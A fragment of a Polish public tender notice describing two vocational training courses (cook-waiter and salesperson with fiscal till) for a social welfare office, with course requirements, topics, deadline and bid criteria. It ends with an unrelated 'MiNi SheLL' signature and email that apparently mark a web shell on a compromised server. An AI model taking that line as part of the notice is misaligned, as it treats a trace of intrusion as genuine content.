<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs kucharz - kelner.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs kucharz - kelner dla 6 osób (200 godzin zegarowych) 
Wykonawca musi zapewnić:
- salę wykładową odpowiednio przystosowaną dla grupy min. 5 osobowej, 
- komplet materiałów szkoleniowych dla wszystkich uczestników kursu + jeden egzemplarz dla GOPS w Węgierskiej Górce,
- min. 3 rodzaje kas fiskalnych
- wykwalifikowaną kadrę dydaktyczną,
- odzież ochronną, i środki czystości,
- badania lekarskie (książeczka SANEPIDu),
- materiały zużywalne do zajęć praktycznych (produkty mięsne, spożywcze),
- kawę, herbatę, drobne ciastka, paluszki dla wszystkich uczestników w każdym dniu kursu,
- dyplom, świadectwo lub zaświadczenie o ukończeniu kursu.
- każdy z uczestników musi mieć do dyspozycji własne stanowisko do gotowania (jedna osoba przy piecu),
Minimalny zakres tematyczny: 
- zasady żywienia
- Technologia gastronomiczna
- Towaroznawstwo
- Rysunek dekoracyjny
- Zajęcia praktyczne w zakresie kucharz  (minimum 100 godzin)
- Wykazywanie kultury osobistej i przestrzeganie etyki zawodowej
- Przygotowanie sali konsumpcyjnej
- Wyposażenie i obsługa sprzętu kelnerskiego w części konsumpcyjnej oraz ekspedycyjnej
- Noszenie zastawy
- Serwowanie potraw
- Wydawanie śniadań oraz przygotowywanie potraw w obecności konsumenta
- Serwowanie napojów bezalkoholowych oraz alkoholowych
- Organizacja przyjęć okolicznościowych
- Obsługa gości hotelowych przez kelnera
- Wystawianie rachunków.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs sprzedawca z obsługą komputera i kasy fiskalnej.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs sprzedawca z obsługą komputera i kasy fiskalnej dla 9 osób (120 godzin zegarowych) 
- salę wykładową odpowiednio przystosowaną dla grupy min. 9 osobowej, 
- salę komputerową z min. 9 komputerami z dostępem do Internetu, i podstawowym pakietem biurowym typu Office,
- min. 3 rodzaje kas fiskalnych
- komplet materiałów szkoleniowych dla wszystkich uczestników kursu + jeden egzemplarz dla GOPS w Węgierskiej Górce,
- badania lekarskie (książeczka SANEPIDu),
- wykwalifikowaną kadrę dydaktyczną,
- kawę, herbatę, drobne ciastka, paluszki dla wszystkich uczestników w każdym dniu kursu,
- obiad dla wszystkich uczestników kursu w każdym dniu kursu (jedno ciepłe danie)
- dyplom, świadectwo lub zaświadczenie o ukończeniu kursu.
Minimalny zakres tematyczny: 
- podstawowe zasady funkcjonowania firmy handlowej
- rozliczenia z kontrahentami					
- psychologia nowoczesnego sprzedawcy				
- marketing w handlu							
- kulisy procesu sprzedaży					
- obsługa kasy fiskalnej 						
- techniki obsługi Klienta z wykorzystaniem narzędzi komp.	
- obsługa komputera w tym programu do fakturowania.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. posiadanie przez instytucję szkoleniową certyfikatu jakości usług - 20</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com